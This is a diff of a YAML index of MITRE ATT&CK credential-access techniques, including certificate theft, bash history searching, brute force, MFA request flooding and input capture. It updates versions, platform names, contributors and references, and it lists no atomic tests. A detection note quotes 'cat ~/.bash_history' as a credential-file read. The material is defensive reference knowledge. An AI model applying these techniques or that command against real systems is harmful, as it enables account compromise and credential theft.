+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -45592,21 +46352,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -45655,33 +46417,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -45696,25 +46436,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -45788,7 +46546,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -45850,11 +46607,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -45903,6 +46659,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -45911,6 +46668,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -45921,13 +46679,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -45983,44 +46742,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46037,25 +46763,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46130,11 +46885,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -46178,11 +46932,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -46206,8 +46959,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -46223,11 +46976,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46238,11 +46990,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -46252,16 +47006,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -46299,13 +47053,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46314,6 +47065,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -46321,11 +47073,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -46343,13 +47095,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -46362,6 +47111,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -46375,12 +47125,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -46412,17 +47163,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -46495,12 +47243,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -46509,6 +47256,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -46527,18 +47275,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -46562,13 +47310,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -46594,6 +47339,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -46605,18 +47351,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -46635,14 +47381,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -46671,24 +47414,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -46723,13 +47468,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -46807,14 +47549,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -46830,6 +47571,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -46838,13 +47580,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -46852,15 +47594,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -46871,9 +47609,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -46919,7 +47656,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -46938,17 +47675,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -46981,10 +47717,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
